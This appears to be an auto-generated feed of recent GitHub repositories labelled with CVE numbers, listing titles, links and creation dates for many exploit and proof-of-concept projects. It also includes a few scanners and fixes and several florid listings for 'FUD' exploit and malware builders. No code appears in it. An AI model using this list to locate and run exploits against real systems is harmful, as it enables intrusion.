**proof of concept of CVE-2023-42793 vulnerability in TeamCity JetBrains** : [WhiteOwl-Pub/JetBrains-PoC-CVE-2023-42793](https://github.com/WhiteOwl-Pub/JetBrains-PoC-CVE-2023-42793) create time: 2023-12-12T15:50:05Z

**This is a script written in Python that allows the exploitation of the Zoneminder's security flaw in the described in CVE 2023-26035.** : [m3m0o/zoneminder-snapshots-rce](https://github.com/m3m0o/zoneminder-snapshots-rce) create time: 2023-12-12T14:44:19Z

**TeamCity JetBrains PoC (CVE-2023-42793)** : [WhiteOwl-Pub/PoC-JetBrains-TeamCity-CVE-2023-42793](https://github.com/WhiteOwl-Pub/PoC-JetBrains-TeamCity-CVE-2023-42793) create time: 2023-10-07T10:23:12Z

**no description** : [namto908/CVE-20186892](https://github.com/namto908/CVE-20186892) create time: 2023-12-12T12:59:50Z

**CVE-2021-40438 Apache <= 2.4.48 SSRF exploit** : [sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit](https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit) create time: 2023-12-12T11:56:23Z

**Đồ án môn thay thế** : [NhutMinh2801/CVE_2017_7494](https://github.com/NhutMinh2801/CVE_2017_7494) create time: 2023-12-12T07:51:37Z

**no description** : [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546) create time: 2023-12-12T07:41:07Z

**no description** : [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_new](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_new) create time: 2023-12-12T05:54:11Z

**no description** : [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144) create time: 2023-12-12T05:14:32Z

**no description** : [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-) create time: 2023-12-11T23:12:03Z

**proof-of-concept for CVE-2023-28197** : [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol) create time: 2023-12-11T20:55:21Z

**Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit** : [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035) create time: 2023-12-11T19:23:13Z

**no description** : [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla) create time: 2023-12-11T17:30:31Z

**no description** : [Bigyls/CVE20186574](https://github.com/Bigyls/CVE20186574) create time: 2023-12-11T12:28:28Z

**Cisco CVE-2023-20198** : [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198) create time: 2023-12-11T10:41:48Z

**no description** : [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909) create time: 2023-12-11T08:23:14Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909) create time: 2023-12-11T06:14:11Z

**no description** : [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce) create time: 2023-12-10T22:29:21Z

**Metabase postgres (org.h2.Driver) RCE without INIT** : [0utl4nder/Another-Metabase-RCE-CVE-2023-38646-](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646-) create time: 2023-12-10T21:07:10Z

**PoC of CVE-2023-4911** : [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables) create time: 2023-12-10T18:05:27Z

**Python version of https://www.exploit-db.com/exploits/15222 by ALEXANDRE ZANNI** : [raystr-atearedteam/CVE2023-23752](https://github.com/raystr-atearedteam/CVE2023-23752) create time: 2023-12-10T16:11:37Z

**Porting the CVE-2020-0674 exploit for Windows8.1 and Windows10** : [Micky-Thongam/Internet-Explorer-UAF](https://github.com/Micky-Thongam/Internet-Explorer-UAF) create time: 2023-12-10T11:52:48Z

**PoC Exploit for VM2 Sandbox Escape Vulnerability** : [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547) create time: 2023-12-10T08:32:26Z

**no description** : [80r1ng/CVE-2023-38831-EXP](https://github.com/80r1ng/CVE-2023-38831-EXP) create time: 2023-12-10T07:13:38Z

**no description** : [80r1ng/CVE-2023-38831-EXP](https://github.com/80r1ng/CVE-2023-38831-EXP) create time: 2023-12-10T06:16:26Z

**no description** : [SpiralBL0CK/cve-2018-8617-aab-r-w-](https://github.com/SpiralBL0CK/cve-2018-8617-aab-r-w-) create time: 2023-12-09T22:25:02Z

**HTTP Protocol Stack Remote Code Execution or System Crashing Vulnerability.** : [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907) create time: 2023-12-09T22:26:49Z

**Exploit for CVE-2023-46604** : [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604) create time: 2023-12-09T19:19:03Z

**no description** : [LSLNT/CVE-2018-6574-PentesterLab](https://github.com/LSLNT/CVE-2018-6574-PentesterLab) create time: 2023-12-09T17:14:38Z

**no description** : [J0rgeM/CVE-2023-2138](https://github.com/J0rgeM/CVE-2023-2138) create time: 2023-12-09T15:47:55Z

**Error-based blind SQL injection with bit-shifting approach for Moodle 3.10.4** : [StackOverflowExcept1on/CVE-2021-36393](https://github.com/StackOverflowExcept1on/CVE-2021-36393) create time: 2023-10-27T17:13:55Z

**CVE-2023-49964: FreeMarker Server-Side Template Injection in Alfresco** : [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964) create time: 2023-12-08T20:47:52Z

**CVE-2023-20273 Exploit PoC** : [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273) create time: 2023-12-09T07:25:43Z

**CVE-2022-21392: Local Privilege Escalation via NMR SUID in Oracle Enterprise Manager** : [mbadanoiu/CVE-2022-21392](https://github.com/mbadanoiu/CVE-2022-21392) create time: 2023-12-08T20:13:23Z

**Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198** : [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix) create time: 2023-12-08T21:12:00Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [tovbumacius/Jpg-Png-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malwaree](https://github.com/tovbumacius/Jpg-Png-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malwaree) create time: 2023-12-08T20:55:54Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [tovbumacius/Slient-PDF-FUD-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware](https://github.com/tovbumacius/Slient-PDF-FUD-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-08T20:53:33Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [tovbumacius/Hta-Exploit-Builder-Slient--Builder-Exploit-Database-Cve-2023-Malware](https://github.com/tovbumacius/Hta-Exploit-Builder-Slient--Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-08T20:53:33Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [tovbumacius/Jpg-Png-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware](https://github.com/tovbumacius/Jpg-Png-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-08T20:53:33Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [tovbumacius/Slient-Url-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware](https://github.com/tovbumacius/Slient-Url-Exploit-Slient--Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-08T20:53:31Z

**no description** : [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118) create time: 2023-12-08T11:29:23Z

**An authorized remote user with access or knowledge of the standard encryption key can gain access and decrypt the FortiOS backup files and all non-administator passwords, private keys and High Availability passwords.** : [saladandonionrings/cve-2019-6693](https://github.com/saladandonionrings/cve-2019-6693) create time: 2023-12-08T11:00:40Z

**no description** : [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118) create time: 2023-12-08T10:51:51Z

**Python script to search Citrix NetScaler logs for possible CVE-2023-4966 exploitation.** : [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs) create time: 2023-12-08T10:28:15Z

**Drivers for HP EliteDesk 800 G2 Mini - inc missing Intel Bluetooth driver & HP Drivers that address CVE's eg CVE-2022-27635** : [rhyslhardy/HP-EliteDesk-800-G2-Mini-Drivers](https://github.com/rhyslhardy/HP-EliteDesk-800-G2-Mini-Drivers) create time: 2023-12-08T06:06:22Z

**CVE-2023-41623** : [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE) create time: 2023-12-08T04:15:06Z

**Exploits for GL.iNet CVE-2023-46454, CVE-2023-46455 and CVE-2023-46456** : [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities) create time: 2023-12-08T01:45:16Z

**no description** : [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613) create time: 2023-08-28T14:45:23Z

**POC&EXP for GlassFish<4.1.1(not including 4.1.1).** : [NeonNOXX/CVE-2017-1000028](https://github.com/NeonNOXX/CVE-2017-1000028) create time: 2023-12-07T07:35:39Z

**no description** : [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch) create time: 2023-12-07T08:03:03Z

**Research on CVE-2021-44228 and CVE-2023-46604** : [dcm2406/CVE-Research](https://github.com/dcm2406/CVE-Research) create time: 2023-12-07T08:02:53Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21145_1](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21145_1) create time: 2023-12-07T06:41:00Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21145](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21145) create time: 2023-06-05T11:20:45Z

**no description** : [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078) create time: 2023-12-07T03:45:27Z

**CVE-2023-28432** : [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432) create time: 2023-12-07T03:33:37Z

**PoC for CVE-2023-46474.** : [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474) create time: 2023-12-06T13:05:22Z

**no description** : [Nguyen-id/CVE-2020-25213](https://github.com/Nguyen-id/CVE-2020-25213) create time: 2023-12-06T10:47:11Z

**Researching on the vulnrability CVE-2023-26136** : [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment) create time: 2023-12-04T13:01:29Z

**A proof of concept for CVE-2023–1326 in apport-cli 2.26.0** : [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC) create time: 2023-12-06T00:07:40Z

**ownCloud exploits for CVE-2023-49105** : [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits) create time: 2023-12-05T11:35:12Z

**Thực nghiệm CVE-2021-44790** : [nuPacaChi/-CVE-2021-44790](https://github.com/nuPacaChi/-CVE-2021-44790) create time: 2023-12-05T05:54:47Z

**nuclei CVE** : [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100) create time: 2023-12-05T05:00:27Z

**no description** : [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690) create time: 2023-12-04T16:58:53Z

**For Aina** : [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024) create time: 2023-12-04T15:55:22Z

**no description** : [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT) create time: 2023-12-04T13:05:08Z

**Proof-of-concept of CVE-2023-38831** : [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC) create time: 2023-12-04T11:13:43Z

**no description** : [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC) create time: 2023-12-04T08:48:28Z

**no description** : [stogaru/cve-2023-39320-exploit](https://github.com/stogaru/cve-2023-39320-exploit) create time: 2023-12-04T09:11:05Z

**no description** : [codeb0ss/CVE-2023-49948-PoC](https://github.com/codeb0ss/CVE-2023-49948-PoC) create time: 2023-12-04T00:17:44Z

**Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint - CVE-2020-14179** : [mrnazu/CVE-2020-14179](https://github.com/mrnazu/CVE-2020-14179) create time: 2023-12-03T13:26:03Z

**A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432** : [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test) create time: 2023-12-03T13:45:34Z

**no description** : [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842) create time: 2023-12-02T23:21:44Z

**Picture in Picture Exploit in Android R V 11** : [aatharvauti/CVE-2021-0485](https://github.com/aatharvauti/CVE-2021-0485) create time: 2023-12-02T14:31:48Z

**CVE-2023-49103 scanner for shodan.io downloaded json files** : [MixColumns/CVE-2023-49103](https://github.com/MixColumns/CVE-2023-49103) create time: 2023-12-02T11:03:19Z

**Demonstration of CVE-2023-24034 authorization bypass in Spring Security** : [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034) create time: 2023-12-02T10:51:39Z

**Proof of concept developed for the CVE-2023-36664** : [JeanChpt/CVE-2023-36664](https://github.com/JeanChpt/CVE-2023-36664) create time: 2023-12-02T10:28:10Z

**Under Construction :) Please come back later** : [SpiralBL0CK/CVE-2017-18019](https://github.com/SpiralBL0CK/CVE-2017-18019) create time: 2023-12-01T23:59:07Z

**Plugin to fix security vulnerability CVE-2023-40626 in Joomla 3.10.12** : [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix) create time: 2023-11-29T19:46:15Z

**Injection EJS, reverse shell possible** : [Hack-Oeil/EJS_INJECTION_CVE_2022](https://github.com/Hack-Oeil/EJS_INJECTION_CVE_2022) create time: 2023-11-18T10:38:25Z

**no description** : [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849) create time: 2023-12-01T11:24:26Z

**CVE-2022-40635: Groovy Sandbox Bypass in CrafterCMS** : [mbadanoiu/CVE-2022-40635](https://github.com/mbadanoiu/CVE-2022-40635) create time: 2023-12-01T10:28:27Z

**CVE-2022-40634: FreeMarker Server-Side Template Injection in CrafterCMS** : [mbadanoiu/CVE-2022-40634](https://github.com/mbadanoiu/CVE-2022-40634) create time: 2023-12-01T10:06:17Z

**no description** : [TomKing062/CVE-2022-38691_38692](https://github.com/TomKing062/CVE-2022-38691_38692) create time: 2023-12-01T07:32:18Z

**This Python implementation serves an educational purpose by demonstrating the exploitation of CVE-2023-23752. The code provides insight into the vulnerability's exploitation.** : [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752) create time: 2023-12-01T02:25:04Z

**no description** : [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752) create time: 2023-11-30T22:47:40Z

**no description** : [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752) create time: 2023-11-30T17:55:38Z

**no description** : [BjarneVerschorre/CVE-2019-9053](https://github.com/BjarneVerschorre/CVE-2019-9053) create time: 2023-11-29T21:47:41Z

**no description** : [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866) create time: 2023-11-30T15:59:16Z

**KD Coming Soon <= 1.7 - Unauthenticated PHP Object Injection via cetitle** : [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615) create time: 2023-11-30T14:46:21Z

**no description** : [l00neyhacker/CVE-2023-48984](https://github.com/l00neyhacker/CVE-2023-48984) create time: 2023-11-30T02:50:23Z

**Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation** : [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840) create time: 2023-11-29T20:14:39Z

**Ansible Playbook for CVE-2023-49103** : [ditekshen/ansible-cve-2023-49103](https://github.com/ditekshen/ansible-cve-2023-49103) create time: 2023-11-29T18:46:54Z

**Repository to exploit CVE-2023-46604 reported for ActiveMQ** : [tomasmussi-mulesoft/activemq-cve-2023-46604](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604) create time: 2023-11-29T18:30:02Z

**Joomla CVE-2023-23752 Exploit Script** : [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script) create time: 2023-11-29T17:01:08Z

**MicroWeber Unauthenticated User Database Disclosure - CVE-2020-13405** : [mrnazu/CVE-2020-13405](https://github.com/mrnazu/CVE-2020-13405) create time: 2023-11-29T15:38:11Z

**poc** : [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357) create time: 2023-11-29T09:52:36Z

**no description** : [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921) create time: 2023-11-29T06:42:43Z

**no description** : [nidhi7598/frameworks_base_AOSP_06_r22_core_CVE-2023-20944](https://github.com/nidhi7598/frameworks_base_AOSP_06_r22_core_CVE-2023-20944) create time: 2023-11-29T06:09:52Z

**no description** : [maixuany/detect_CVE_2021_31166](https://github.com/maixuany/detect_CVE_2021_31166) create time: 2023-11-29T05:51:21Z

**no description** : [EDLLT/CVE-2016-5195-master](https://github.com/EDLLT/CVE-2016-5195-master) create time: 2023-11-29T03:34:10Z

**Confluence broken access control to code execution** : [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515) create time: 2023-11-29T01:34:35Z

**Swift Performance Lite <= 2.3.6.14 - Missing Authorization to Unauthenticated Settings Export** : [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289) create time: 2023-11-28T20:05:43Z

**include sitecore rce(CVE-2021-42237) & kentico rce(CVE-2019-10068) & dnn rce(CVE-2017-9822) & viewstate crack & CVE-2019-18935** : [mitton111/E-Exploit](https://github.com/mitton111/E-Exploit) create time: 2023-11-28T15:55:43Z

**A proof of concept exploiting CVE-2022-26923.** : [Gh-Badr/CVE-2022-26923](https://github.com/Gh-Badr/CVE-2022-26923) create time: 2023-11-28T16:13:36Z

**CVE-2023-23752** : [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752) create time: 2023-11-28T16:08:16Z

**Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)** : [4m3rr0r/CVE-2011-2523-poc](https://github.com/4m3rr0r/CVE-2011-2523-poc) create time: 2023-11-28T10:52:33Z

**Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and enableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack.** : [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314) create time: 2023-11-28T10:39:19Z

**test repo for CVE-2023-36025** : [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025) create time: 2023-11-28T10:34:50Z

**Geoserver SQL Injection Exploit** : [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157) create time: 2023-11-28T07:23:00Z

**list CVE - 2023** : [ayhan-dev/CVE-LIST](https://github.com/ayhan-dev/CVE-LIST) create time: 2023-11-28T06:54:25Z

**An automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography.** : [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord) create time: 2023-11-28T03:47:32Z

**Confluence CVE-2023-22518** : [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518) create time: 2023-11-28T03:33:16Z

**no description** : [ZZY3312/CVE-2023-41993](https://github.com/ZZY3312/CVE-2023-41993) create time: 2023-11-28T00:55:11Z

**no description** : [ZZY3312/CVE-2023-41991](https://github.com/ZZY3312/CVE-2023-41991) create time: 2023-11-28T00:38:43Z

**A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.** : [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313) create time: 2023-11-27T23:59:35Z

**Privilege Escalation - Heap Buffer Overflow Vulnerability** : [WhiteH4T-Dev/CVE-2023-4911-Looney-Tunables](https://github.com/WhiteH4T-Dev/CVE-2023-4911-Looney-Tunables) create time: 2023-11-27T23:26:55Z

**Proof of concept developed for the CVE-2023-36664** : [JeanChpt/CVE-2023-36664](https://github.com/JeanChpt/CVE-2023-36664) create time: 2023-11-27T12:47:43Z

**Bluetooth Forward and Future Secrecy Attacks and Defenses (BLUFFS) [CVE 2023-24023]** : [francozappa/bluffs](https://github.com/francozappa/bluffs) create time: 2023-11-10T09:37:31Z

**Microweber version 2.0.4 vulnerable to "Uploading Malicious Files"** : [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052) create time: 2023-11-27T14:29:32Z

**no description** : [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948) create time: 2023-10-25T13:50:41Z

**- using python to detect cve-2017-8464 vulnerbilities** : [TieuLong21Prosper/Detect-CVE-2017-8464](https://github.com/TieuLong21Prosper/Detect-CVE-2017-8464) create time: 2023-11-27T10:28:47Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2019-19447](https://github.com/Trinadh465/linux-4.19.72_CVE-2019-19447) create time: 2023-11-27T10:49:52Z

**Programm to exploit a range of ip adresses** : [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966) create time: 2023-11-27T09:51:30Z

**no description** : [lapis33/CVE-2017-5689](https://github.com/lapis33/CVE-2017-5689) create time: 2023-08-14T14:01:11Z

**no description** : [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048) create time: 2023-11-27T07:19:49Z

**Windows Defendor SmartScreen Bypass** : [DamnIt74/CVE-2023-36025](https://github.com/DamnIt74/CVE-2023-36025) create time: 2023-11-27T02:36:41Z

**no description** : [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.) create time: 2023-11-26T21:24:55Z

**working exploit for CVE-2019-9053** : [davcwikla/CVE-2019-9053-exploit](https://github.com/davcwikla/CVE-2019-9053-exploit) create time: 2023-11-26T20:23:28Z

**https://github.com/AbelChe/evil_minio/tree/main 打包留存** : [Fw-fW-fw/CVE-2023-28432-minio_update_rce](https://github.com/Fw-fW-fw/CVE-2023-28432-minio_update_rce) create time: 2023-11-26T18:23:33Z

**CVE-2020-8254: Zip Slip in Pulse Secure VPN Windows Client** : [mbadanoiu/CVE-2020-8254](https://github.com/mbadanoiu/CVE-2020-8254) create time: 2023-11-26T13:42:37Z

**CVE-2020-8250: Privilege Escalation via Command Injection in Pulse Secure VPN Linux Client** : [mbadanoiu/CVE-2020-8250](https://github.com/mbadanoiu/CVE-2020-8250) create time: 2023-11-26T13:35:43Z

**CVE-2020-8249: Buffer Overflow in Pulse Secure VPN Linux Client** : [mbadanoiu/CVE-2020-8249](https://github.com/mbadanoiu/CVE-2020-8249) create time: 2023-11-26T13:28:07Z

**CVE-2020-8248: Privilege Escalation via Zip Wildcard Exploit in Pulse Secure VPN Linux Client** : [mbadanoiu/CVE-2020-8248](https://github.com/mbadanoiu/CVE-2020-8248) create time: 2023-11-26T13:10:41Z

**no description** : [elsvital/cve-2022-33891-fix](https://github.com/elsvital/cve-2022-33891-fix) create time: 2023-11-26T13:09:28Z

**CVE-2023-5561** : [justhx0r/CVE-2023-5561](https://github.com/justhx0r/CVE-2023-5561) create time: 2023-11-26T03:47:33Z

**PoC for CVE-2015-3306 a arbitrary file write vulnerability in ProFTPd 1.3.5** : [xchg-rax-rax/CVE-2015-3306-](https://github.com/xchg-rax-rax/CVE-2015-3306-) create time: 2023-11-25T19:39:26Z

**CVE-2021-20253: Privilege Escalation via Job Isolation Escape in Ansible Tower** : [mbadanoiu/CVE-2021-20253](https://github.com/mbadanoiu/CVE-2021-20253) create time: 2023-11-25T18:56:51Z

**Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.** : [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646) create time: 2023-11-25T17:22:22Z

**Chain CVE-2019-11408 – XSS in operator panel and CVE-2019-11409 – Command injection in operator panel.** : [HoseynHeydari/fusionpbx_rce_vulnerability](https://github.com/HoseynHeydari/fusionpbx_rce_vulnerability) create time: 2023-11-25T17:04:39Z

**CVE-2023-34468: Remote Code Execution via DB Components in Apache NiFi** : [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468) create time: 2023-11-25T12:21:48Z

**A multi-threaded scanner for the ownCloud vulnerablility CVE-2023-49103** : [xchg-rax-rax/CVE-2023-49103_scanner](https://github.com/xchg-rax-rax/CVE-2023-49103_scanner) create time: 2023-11-25T10:01:05Z

**no description** : [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720) create time: 2023-11-25T04:06:01Z

**no description** : [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo) create time: 2023-11-24T22:42:56Z

**A tool that exploits the CVE-2011-2523 vulnerability.** : [chleba124/vsftpd-exploit](https://github.com/chleba124/vsftpd-exploit) create time: 2023-11-24T21:09:00Z

**A tool to check how well a system can handle Rapid Reset DDoS attacks (CVE-2023-44487).** : [terrorist/CVE-2023-44487](https://github.com/terrorist/CVE-2023-44487) create time: 2023-11-24T18:26:36Z

**Research into CVE-2022-41853. Using static functions to obtian RCE via Java Deserialization** : [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853) create time: 2023-11-24T10:30:56Z

**no description** : [zhangkaibin0921/CVE-2017-10271](https://github.com/zhangkaibin0921/CVE-2017-10271) create time: 2023-11-24T07:41:44Z

**Exploit forCVE-2020-29607** : [0xN7y/CVE-2020-29607](https://github.com/0xN7y/CVE-2020-29607) create time: 2023-11-24T07:20:18Z

**CVE-2021-46364: YAML Deserialization in Magnolia CMS** : [mbadanoiu/CVE-2021-46364](https://github.com/mbadanoiu/CVE-2021-46364) create time: 2023-11-23T22:37:01Z

**CVE-2023-40037: Incomplete Validation of JDBC and JNDI Connection URLs in Apache NiFi** : [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037) create time: 2023-11-23T22:26:21Z

**CVE-2023-34212: Java Deserialization via JNDI Components in Apache NiFi** : [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212) create time: 2023-11-23T22:14:49Z

**CVE-2023-26269: Misconfigured JMX in Apache James** : [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269) create time: 2023-11-23T21:55:30Z

**no description** : [JC175/CVE-2023-44353-Nuclei-Template](https://github.com/JC175/CVE-2023-44353-Nuclei-Template) create time: 2023-11-23T20:15:00Z

**Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)** : [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC) create time: 2023-11-05T16:33:32Z

**Exploit for CVE-2022-46169** : [0xN7y/CVE-2022-46169](https://github.com/0xN7y/CVE-2022-46169) create time: 2023-11-23T17:36:20Z

**CVE-2023-36553 unauthenticated RCE PoC for Fortinet Fortisiem** : [kenit7s/CVE-2023-36553-RCE](https://github.com/kenit7s/CVE-2023-36553-RCE) create time: 2023-11-23T04:55:52Z

**no description** : [nidhi7598/linux-4.19.72_net_CVE-2023-4208](https://github.com/nidhi7598/linux-4.19.72_net_CVE-2023-4208) create time: 2023-11-23T04:50:24Z

**PoC for the CVE-2023-49103** : [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103) create time: 2023-11-22T17:00:23Z

**This script can help determine the CPU ID for the processor of your system, please note that I have not added every CPU ID to this script, edit as needed.** : [Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-) create time: 2023-11-22T15:02:49Z

**no description** : [A1Lin/cve-2022-1364](https://github.com/A1Lin/cve-2022-1364) create time: 2023-11-22T10:55:34Z

